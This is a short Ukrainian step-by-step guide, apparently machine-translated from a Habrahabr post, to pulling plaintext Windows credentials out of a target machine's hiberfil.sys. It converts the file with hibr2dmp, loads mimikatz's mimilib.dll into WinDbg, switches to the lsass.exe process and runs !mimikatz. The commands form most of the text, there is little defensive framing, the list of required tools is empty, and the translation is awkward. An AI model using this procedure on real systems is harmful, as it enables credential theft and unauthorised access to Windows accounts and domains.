Відновлюємо локальні та доменні паролі з hiberfil.sys

Утиліта mimikatz, що дозволяє витягувати облікові дані Windows LSA у відкритому вигляді, існує з 2012 року, однак крім добре освітленого функціоналу відновлення паролів з пам'яті працює ОС у неї є ще одна досить цікава можливість. Далі я наведу покрокову інструкцію, як за допомогою нехитрих дій витягти облікові дані з файлу hiberfil.sys.

Підготовка
Для здійснення задуманого нам знадобляться наступні утиліти:

І, власне, сам mimikatz.

Дії
1. Отримуємо файл hiberfil.sys з цільової машини.

2. Конвертований файл у формат зрозумілий WinDbg.

hibr2dmp.exe d:\temp\hiberfil.sys c:\temp\hiberfil.dmp

Процес може зайняти досить тривалий час

image

3. Запускаємо WinDbg і відкриваємо отриманий файл.

File- > Open Crash Dump

4. Налаштовуємо символи налагодження.

Відкриваємо File -> Symbol File Path... і вписуємо наступну рядок:

SRV*c:\symbols*http://msdl.microsoft.com/download/symbols

image

Замість c:\symbols, природно, може бути будь-який каталог, в який будуть завантажені символи

У командному рядку дебагера пишемо:

0: kd> .reload /n

Чекаємо закінчення завантаження символів:

image

5. Вказуємо шлях до бібліотеки mimilib.dll (знаходиться в каталозі з mimikatz).

0: kd> .load z:\Soft\Security\Passwords\Mimikatz\x64\mimilib.dll

image

6. Знаходимо адреса процесу lsass.exe.

0: kd> !process 0 0 lsass.exe

image

В даному випадку адреса: fffffa800a7d9060.

7. Перемикаємо контекст процесу.

0: kd> .process /r /p fffffa800a7d9060

image

8. Запускаємо mimikatz і отримуємо паролі у відкритому вигляді.

0:kd> !mimikatz

image

Посилання по темі
Розкриття облікових даних в Microsoft Windows: http://www.securitylab.ua/vulnerability/420418.php
LSA Authentication: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378326(v=vs.85).aspx
What is Digest Authentication: https://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx<habracut/>

Джерело: Хабрахабр

0 коментарів

Тільки зареєстровані та авторизовані користувачі можуть залишати коментарі.